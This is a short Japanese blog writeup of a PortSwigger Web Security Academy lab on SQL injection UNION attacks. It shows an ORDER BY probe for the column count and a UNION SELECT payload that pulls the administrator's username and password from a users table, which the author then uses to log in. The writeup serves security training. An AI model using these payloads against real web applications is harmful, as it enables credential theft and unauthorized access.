shinobe179の日記

@shinobe179 の技術メモ・やらかし録

SQL injection UNION attack, retrieving data from other tables

はじめに

SQL injection UNION attack, retrieving data from other tables」のWriteupです。

portswigger.net

Summary

  • UNION SELECT を使って、別のテーブルの情報を読み出す
  • 列数、型の辻褄を合わせなければならないことに留意

Writeup

目的は、usersテーブルにあるusername=administratorのpasswordを取得してログインすることです。

列数の確認です。 '+ORDER+BY+3--+ でエラーが発生したので2列です。

f:id:befs_anne:20210425000234p:plain

型の確認をしませんでしたが…以下でusernameとpasswordがレスポンスされました。

'+UNION+SELECT+username,password+FROM+users+WHERE+username='administrator'--+

f:id:befs_anne:20210425000318p:plain

administratorとしてログインできました。

f:id:befs_anne:20210425000439p:plain